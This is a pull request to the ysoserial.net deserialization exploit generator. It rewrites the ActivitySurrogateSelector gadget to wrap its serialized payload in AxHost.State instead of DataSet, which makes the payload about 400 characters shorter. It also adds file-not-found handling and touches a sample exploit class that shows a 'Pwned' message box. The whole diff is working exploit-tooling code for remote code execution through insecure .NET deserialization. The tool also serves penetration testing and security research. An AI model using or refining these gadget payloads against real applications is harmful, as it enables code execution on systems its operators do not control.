### PR TITLE
Size improvement for ActivitySurrogateSelectorGenerator

### DIFF
--- a/ysoserial/ExploitClass.cs
+++ b/ysoserial/ExploitClass.cs
@@ -3,13 +3,13 @@
     {
         public E()
         {
-            //try
-            //{
-                /* Payload code to be executed. Examples: */
+        //try
+        //{
+        /* Payload code to be executed. Examples: */
 
 
-                /* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
-                System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
+        /* Showing a message box: -c "..\..\ExploitClass.cs;System.Windows.Forms.dll" */
+        System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
 
 
                 /* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll"  */

--- a/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
@@ -48,8 +48,17 @@ namespace ysoserial.Generators
         
         public override object Generate(string formatter, InputArgs inputArgs)
         {
-            PayloadClassFromFile payload = new PayloadClassFromFile(inputArgs.Cmd);
-            return Serialize(payload, formatter, inputArgs);
+            try
+            {
+                PayloadClassFromFile payload = new PayloadClassFromFile(inputArgs.Cmd);
+                return Serialize(payload, formatter, inputArgs);
+            }
+            catch(System.IO.FileNotFoundException e1)
+            {
+                Console.WriteLine("Error in provided file(s): \r\n" + e1.Message);
+                return "";
+            }
+            
         }
     }
 }

--- a/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
+++ b/ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
@@ -106,6 +106,7 @@ namespace ysoserial.Generators
 
             // Wrap the object inside a DataSet. This is so we can use the custom
             // surrogate selector. Idiocy added and removed here.
+            /*
             info.SetType(typeof(System.Data.DataSet));
             info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
             info.AddValue("DataSet.DataSetName", "");
@@ -121,6 +122,20 @@ namespace ysoserial.Generators
             fmt.SurrogateSelector = new MySurrogateSelector();
             fmt.Serialize(stm, ls);
             info.AddValue("DataSet.Tables_0", stm.ToArray());
+            //*/
+
+            //* saving around  404 characters by using AxHost.State instead of DataSet
+            // However, DataSet can apply to more applications
+            // https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state
+            // vs
+            // https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset
+            BinaryFormatter fmt = new BinaryFormatter();
+            MemoryStream stm = new MemoryStream();
+            fmt.SurrogateSelector = new MySurrogateSelector();
+            fmt.Serialize(stm, ls);
+            info.SetType(typeof(System.Windows.Forms.AxHost.State));
+            info.AddValue("PropertyBagBinary", stm.ToArray());
+            //*/
         }
     }
 


### PR DESCRIPTION
Payload is around 400 characters shorter using AxHost.State rather than DataSet. I have kept the old code if it is needed in some cases.

We can add variant option to it in the future if it is needed (to support both).